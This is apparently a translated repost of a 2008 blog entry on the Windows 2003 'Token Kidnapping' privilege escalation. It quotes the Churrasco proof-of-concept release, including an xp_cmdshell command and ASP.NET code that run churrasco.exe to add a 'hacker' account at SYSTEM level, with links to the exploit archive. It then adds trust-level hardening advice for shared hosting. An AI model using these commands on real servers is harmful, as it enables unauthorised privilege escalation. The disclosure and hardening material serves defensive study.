Token Kidnapping Windows 2003 exploit

This article describes a critical vulnerability found in Windows 2003, the Token Kidnapping vulnerability, which allows an attacker to execute code at the SYSTEM level. It includes the PoC exploit code samples, showing how code can be executed through an IIS 6 worker process or SQL Server, and how an ASP.NET or classic ASP web application can be used to carry out the attack.


I saw someone testing this in the aggregator and chatted with 刺 about it; 刺 told me that MS has not patched this vulnerability, so I tested it right away. See the screenshots:
[Screenshots: 1.jpg (263.08 KB) and 2.jpg (167.91 KB), attached 2008-10-9 15:08]


It seems to have been disclosed at some conference.


http://www.milw0rm.com/exploits/6705


(From http://nomoreroot.blogspot.com/2008/10/windows-2003-poc-exploit-for-token.html)
It has been a long time since the Token Kidnapping presentation (http://www.argeniss.com/research/TokenKidnapping.pdf)
was published, so I decided to release a PoC exploit for Win2k3 that allows executing code under the SYSTEM account.
Basically, if you can run code under any service in Win2k3 then you can own Windows; this is because Windows
service accounts can impersonate. Other processes (not services) that can impersonate are IIS 6 worker processes,
so if you can run code from an ASP .NET or classic ASP web application then you can own Windows too. If you provide
shared hosting services then I would recommend not allowing users to run this kind of code from ASP.
-SQL Server is a nice target for the exploit if you are a DBA and want to own Windows:
exec xp_cmdshell 'churrasco "net user /add hacker"'
-Exploiting IIS 6 with ASP .NET :
...
System.Diagnostics.Process myP = new System.Diagnostics.Process();
myP.StartInfo.RedirectStandardOutput = true;
myP.StartInfo.FileName=Server.MapPath("churrasco.exe");
myP.StartInfo.UseShellExecute = false;
myP.StartInfo.Arguments= " \"net user /add hacker\" ";
myP.Start();
string output = myP.StandardOutput.ReadToEnd();
Response.Write(output);
...
You can find the PoC exploit here http://www.argeniss.com/research/Churrasco.zip
backup link: http://milw0rm.com/sploits/2008-Churrasco.zip
Enjoy.
Cesar.
# milw0rm.com [2008-10-08]
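The post's advice for shared hosting (do not let tenants run this kind of code from ASP) maps to ASP.NET's code access security trust levels. The configuration below is an added example, not part of the original post or of the Churrasco PoC: System.Diagnostics.Process requires Full trust, so a Medium trust level enforced from the server-wide root web.config stops managed tenant code from launching a binary such as churrasco.exe. The config path is the .NET 2.0 32-bit default and is given for illustration only.

```xml
<!-- Added example, not from the original post. Placeholder paths; adjust for the host. -->

<!-- Weak: a per-site web.config at the ASP.NET default, Full trust.
     Full trust permits System.Diagnostics.Process.Start(), i.e. the exact
     call used in the ASP .NET snippet above. -->
<configuration>
  <system.web>
    <trust level="Full" />
  </system.web>
</configuration>

<!-- Hardened: set in the server-wide root web.config, e.g.
     %SystemRoot%\Microsoft.NET\Framework\v2.0.50727\CONFIG\web.config
     (Framework64 on a 64-bit host). Medium trust denies the FullTrust
     link demand on the Process class, so Process.Start() throws a
     SecurityException instead of spawning a child process.
     allowOverride="false" prevents a tenant's own web.config from
     raising the level back to Full. -->
<configuration>
  <location allowOverride="false">
    <system.web>
      <trust level="Medium" originUrl="" />
    </system.web>
  </location>
</configuration>
```

This only constrains managed ASP .NET code; the classic ASP path mentioned in the post is not covered by CAS trust levels and needs its own controls on the worker process (for example restricting which COM components such as the shell object are available). Trust levels also do not remove the underlying impersonation privilege from the worker process identity, so they limit who can reach the bug rather than fixing it.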

Reposted from: https://www.cnblogs.com/jannock/archive/2008/10/10/1308086.html
